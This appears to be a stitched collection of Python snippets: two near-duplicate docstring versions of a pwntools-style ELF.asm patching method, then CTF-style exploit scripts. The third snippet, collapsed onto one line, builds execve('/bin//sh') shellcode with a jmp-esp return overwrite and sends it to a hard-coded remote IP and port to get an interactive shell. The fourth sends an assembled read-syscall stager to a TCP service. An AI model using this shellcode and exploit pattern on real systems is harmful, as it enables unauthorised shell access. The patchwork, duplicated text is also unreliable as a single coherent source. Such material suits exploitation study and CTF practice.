def asm(self, address, assembly):
    """Assemble *assembly* and patch the resulting bytes into the ELF at *address*.

    The ELF is modified in memory; the patched image can be written out
    afterwards with ``ELF.save()``.

    Arguments:
        address(int): virtual address the code is written to; it is also
            handed to the assembler as ``vma``.
        assembly(str): assembly source text to assemble.

    Note: no architecture, word size or endianness is passed to the assembler
    here, so the target it assembles for comes from the ambient assembler
    settings rather than from this ELF object — callers should make sure the
    two agree before patching.
    """
    self.write(address, asm(assembly, vma=address))
def asm(self, address, assembly):
    """asm(address, assembly)

    Assembles the given instructions and writes the encoded bytes over
    whatever the ELF currently holds at ``address``.

    This modifies the ELF in-place.
    The resulting binary can be saved with :meth:`.ELF.save`

    Arguments:
        address(int): virtual address to patch; also passed to the
            assembler as ``vma``.
        assembly(str): assembly source text.

    Note: the assembler is invoked without an explicit architecture, so the
    encoding it produces follows the ambient assembler settings, not this
    ELF's own header — confirm they match before relying on the patch.
    """
    # Assemble first, then patch; a failed assemble leaves the ELF untouched.
    encoded = asm(assembly, vma=address)
    self.write(address, encoded)
# pop rax # 1 byte # cdq # 1 byte # sub esp, 0x16 # 3 bytes <-- 0x16 because 18 bytes + 4 bytes (ret override) = 22 bytes # jmp esp # 2 bytes from pwnlib.asm import * from pwn import * payload_part_1 = [ 'push 0x0b', 'pop eax', 'push ecx', 'push 0x68732f2f', 'push 0x6e69622f', 'mov ebx, esp', 'int 0x80' ] payload_part_2 = ['xor ecx, ecx', 'xor edx, edx', 'sub esp, 0x16', 'jmp esp'] # trying with strings # \x31\xC9\x31\xD2\x68\x2F\x2F\x73\x68\x68\x2F\x62\x69\x6E\x89\xE3\xCD\x08\x6A\x0B\x58\x99\x83\xEC\x16\xFF\xE4 hexload1 = b''.join([asm(i, arch='i386') for i in payload_part_1]) hexload2 = b''.join([asm(i, arch='i386') for i in payload_part_2]) payload = hexload1 + p32(0x0804919f) + hexload2 print(payload, len(payload)) HOST = '167.71.143.20' PORT = 31501 p = remote(HOST, PORT) p.recvuntil("> ") p.sendline(payload) p.interactive() with open('payload.hex', 'wb') as f: f.write(payload)
# Python 2 script (print statement, raw_input, str.encode('hex')): it will
# not run unchanged on Python 3. It assembles a short code stub, waits for a
# keypress, sends the bytes to a TCP service and prints three reads back.
# socket and sys are not imported explicitly; they presumably arrive via the
# pwn star-import — confirm if this is ever run standalone.
from pwn import *
from pwnlib.asm import *

# The first LOCAL assignment is dead: it is immediately overwritten by the
# argv form, so the script requires one command-line argument (the host) and
# raises IndexError without it. The port 40002 is fixed.
LOCAL = ('localhost', 40002)
LOCAL = (sys.argv[1], 40002)
# LOCAL = ('128.199.133.96',31331)
# Maximum bytes requested per recv(); each call may return fewer, or b''
# once the peer closes.
BUFFER = 4096

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(LOCAL)

# asm() is called with no arch/bits argument, so the encoding follows the
# ambient assembler settings rather than anything declared here — the
# 16-bit register forms (ax, cx) suggest a 32-bit x86 target was intended,
# but that is not pinned down in the script.
x = asm("""
mov ax,0x3
push eax
pop ebx
sub cx,128
push ecx
pop edx
int 0x80
ret
""")

# Show the stub length and its hex encoding, then pause until Enter is
# pressed so the bytes can be checked before they are sent.
print len(x), x.encode('hex')
raw_input("?")
s.send(x)
# Three blocking reads; if the service sends less, a recv() may block
# indefinitely since no timeout is set on the socket.
print s.recv(BUFFER)
print s.recv(BUFFER)
print s.recv(BUFFER)
# Not wrapped in try/finally, so the socket is only closed on the happy path.
s.close()